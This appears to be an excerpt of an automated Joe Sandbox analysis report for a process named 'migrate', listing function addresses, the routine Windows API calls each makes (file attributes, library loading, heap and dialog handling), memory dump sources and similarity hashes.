                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2447670028-0
                                                                                                                                                                                                    • Opcode ID: 895413e736363eb67389738ebd19c1189a1a099b55a05e776c3ae90b29f6f09d
                                                                                                                                                                                                    • Instruction ID: 2509907a520863e9f672de76e2222deae15b37ab8effe3a3ceb86fe2b623717e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 895413e736363eb67389738ebd19c1189a1a099b55a05e776c3ae90b29f6f09d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33F0F63261131166DB212B759C04FAF3B688FD1F70F250136F818A6191DFB4CD0081A0
                                                                                                                                                                                                    Function 0012109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 001210AB
                                                                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 001210B2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1231390398-0
                                                                                                                                                                                                    • Opcode ID: 021a907a542b7fd6fabe4d4a8d7334cfabcea5852f4af132721696845da6a141
                                                                                                                                                                                                    • Instruction ID: 3f6eed8a793aad1c3e8b40e6fc102af283389532a2efd794f5d8410136b5d519
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 021a907a542b7fd6fabe4d4a8d7334cfabcea5852f4af132721696845da6a141
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6E09276B00255B7CF09CBA5AC058AF72EDEA542043104175F413D3501FA30DE814764
                                                                                                                                                                                                    Function 00138268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013BF30: GetEnvironmentStringsW.KERNEL32 ref: 0013BF39
                                                                                                                                                                                                      • Part of subcall function 0013BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013BF5C
                                                                                                                                                                                                      • Part of subcall function 0013BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0013BF82
                                                                                                                                                                                                      • Part of subcall function 0013BF30: _free.LIBCMT ref: 0013BF95
                                                                                                                                                                                                      • Part of subcall function 0013BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0013BFA4
                                                                                                                                                                                                    • _free.LIBCMT ref: 001382AE
                                                                                                                                                                                                    • _free.LIBCMT ref: 001382B5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 400815659-0
                                                                                                                                                                                                    • Opcode ID: e93fb17f822ab71ac233ccded3b8f0440868d8a7d8e3182a7683ef17265bd89b
                                                                                                                                                                                                    • Instruction ID: fd76f8bcb413cceb375f4bb722f09f6d8e509228a2ea76287ed02a20b80ea8c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e93fb17f822ab71ac233ccded3b8f0440868d8a7d8e3182a7683ef17265bd89b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E02B3360AF4241E66133793C4262F06248FA1338F260216FA14D70C3DF20C80384A2
                                                                                                                                                                                                    Function 0011E648 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringW.USER32(001113B6,?,00151098,001113B6), ref: 0011E678
                                                                                                                                                                                                    • LoadStringW.USER32(001113B6,?,00151098), ref: 0011E68F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                    • Opcode ID: 49fa3af5e30a44f73f10076ea73cd43746058b8398370b9aa8372e5d6181b226
                                                                                                                                                                                                    • Instruction ID: 5d050e93dd4e0e4418347b5cda341cc787b01117ce4c901e8356765ddfb519e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49fa3af5e30a44f73f10076ea73cd43746058b8398370b9aa8372e5d6181b226
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0FE75100258FBCF121F61EC04DEB7F69EF19391B404425FE5899120D33289E0EBA0
                                                                                                                                                                                                    Function 0011A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A501
                                                                                                                                                                                                      • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A532
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                                                                                    • Opcode ID: 7ad44b160d13f742e4fddf403ade4576136a1e9648ecd4e92e57b6ed1331e329
                                                                                                                                                                                                    • Instruction ID: 19784199ff3b698ed51f8621b7894cd8d12a81e9e6cae53ce102f3c702a94b4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ad44b160d13f742e4fddf403ade4576136a1e9648ecd4e92e57b6ed1331e329
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F0E5312041097BDF015F60DC41FDA3B6DAF14385F448460B844D6160DB31CAD8DB10
                                                                                                                                                                                                    Function 0011A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641,000000FF), ref: 0011A1F1
                                                                                                                                                                                                      • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641), ref: 0011A21F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2643169976-0
                                                                                                                                                                                                    • Opcode ID: d9252c1764bbc2fc8985c4efa089d56ba162f62d6678e6977ebcd19d87e0a16e
                                                                                                                                                                                                    • Instruction ID: 2603477558b55cb493f3750da854fadd266d14baf7cfd0c94a63b94d63422b38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9252c1764bbc2fc8985c4efa089d56ba162f62d6678e6977ebcd19d87e0a16e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8E0D8351412196BDB115F60EC45FDA37ACAF1C3C1F484031B944D2060EB71DED4DA50
                                                                                                                                                                                                    Function 0012AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00142641,000000FF), ref: 0012ACB0
                                                                                                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00142641,000000FF), ref: 0012ACB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3856339756-0
                                                                                                                                                                                                    • Opcode ID: 0ce3fafd1657fe9bc2a0689918c700b40d1c76f6cbc86bb804b646538a710aaf
                                                                                                                                                                                                    • Instruction ID: dadfee95ce8a5d614d60fabf6e26cc9ab5ea24465e27f35b397bc16669775bfd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ce3fafd1657fe9bc2a0689918c700b40d1c76f6cbc86bb804b646538a710aaf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79E06572504650EFC7019B58DC06B45FBA9FB48B20F004265F416D3B70CB746880CA94
                                                                                                                                                                                                    Function 0011A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0011A23A,?,0011755C,?,?,?,?), ref: 0011A254
                                                                                                                                                                                                      • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0011A23A,?,0011755C,?,?,?,?), ref: 0011A280
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                                                                                    • Opcode ID: 70421442e4c8bb5fc6720208a2aea71b9c848928bbe75e4fb1c6c669b27aa6d7
                                                                                                                                                                                                    • Instruction ID: 5118baef0ad21ea1a02d53c2dd6af00479c0da2623a97907f7da2166243974f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70421442e4c8bb5fc6720208a2aea71b9c848928bbe75e4fb1c6c669b27aa6d7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE092355001245BCB11EB64EC05BD97BE8AB193E1F044271FD54E31E0D770DEC4CAA0
                                                                                                                                                                                                    Function 0012DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012DEEC
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0012DF03
                                                                                                                                                                                                      • Part of subcall function 0012B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
                                                                                                                                                                                                      • Part of subcall function 0012B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
                                                                                                                                                                                                      • Part of subcall function 0012B568: IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
                                                                                                                                                                                                      • Part of subcall function 0012B568: TranslateMessage.USER32(?), ref: 0012B5AC
                                                                                                                                                                                                      • Part of subcall function 0012B568: DispatchMessageW.USER32(?), ref: 0012B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2718869927-0
                                                                                                                                                                                                    • Opcode ID: fd894765a990cdf1bfdda7ccd1c57c887611c6a8eaabccaa27690589f742af22
                                                                                                                                                                                                    • Instruction ID: d971374dc2859810261a516eb764ba95e10d2791599fae6a9e3a5e84bb96ab5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd894765a990cdf1bfdda7ccd1c57c887611c6a8eaabccaa27690589f742af22
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE09B7540435866DF01A761EC06FDE37AC5B15785F440451B644EA0A2DB78E6A08771
                                                                                                                                                                                                    Function 0012081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1175261203-0
                                                                                                                                                                                                    • Opcode ID: a4ebf6ead1a73fd40c57eaac708e97c191524143d9d07ccf561893290aa76b38
                                                                                                                                                                                                    • Instruction ID: fa5295be7e069d025c2039888cbb597f94d2d8ca7a01af3c8daba249004cf565
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4ebf6ead1a73fd40c57eaac708e97c191524143d9d07ccf561893290aa76b38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6E01A768001286ADB11ABA4AC49FDA7BACAF19391F040165B649E2014DB74DAD58AA0
                                                                                                                                                                                                    Function 0012A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0012A3DA
                                                                                                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0012A3E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1918208029-0
                                                                                                                                                                                                    • Opcode ID: 8cc7e0d66f2a17e862242269f3bf1dc4b824453f6c2824b441a230c2308134c0
                                                                                                                                                                                                    • Instruction ID: 28bc0d52b10252d6b7b4229b27a18edc221b2325ad5cec1968daf6ee2743e78a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cc7e0d66f2a17e862242269f3bf1dc4b824453f6c2824b441a230c2308134c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27E01271500228EFCB14DF55D54179DBBF8FF15361F10C05AE84697201E374AE14DB91
                                                                                                                                                                                                    Function 00132B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00132BAA
                                                                                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00132BB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1660781231-0
                                                                                                                                                                                                    • Opcode ID: 1edf3a3d23787c5e9abfdf9346d98d0e2e2ba5db80a00d1e7e0a0fb8b7837a51
                                                                                                                                                                                                    • Instruction ID: 4ed056942601ac5696c65bff75ae3ffbf324b02c05bb1e8be44cc8d31665a8f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1edf3a3d23787c5e9abfdf9346d98d0e2e2ba5db80a00d1e7e0a0fb8b7837a51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABD0223915430018EC383EB03803848B385BE62BB3FF0528AF030868C9EF318081A025
                                                                                                                                                                                                    Function 001112F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemShowWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3351165006-0
                                                                                                                                                                                                    • Opcode ID: f5d10151fd41af01f30f664ae43bf61297aa52114117b654d0a0f585b89bdc08
                                                                                                                                                                                                    • Instruction ID: 2350265472df388dd89bbf08d51cca4199ab610547e57352576af50f5896a38f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5d10151fd41af01f30f664ae43bf61297aa52114117b654d0a0f585b89bdc08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42C0123205C200FECB010BB4DC09C2BBBB8ABA5312F04C908B0B9C0060CA38C190FB12
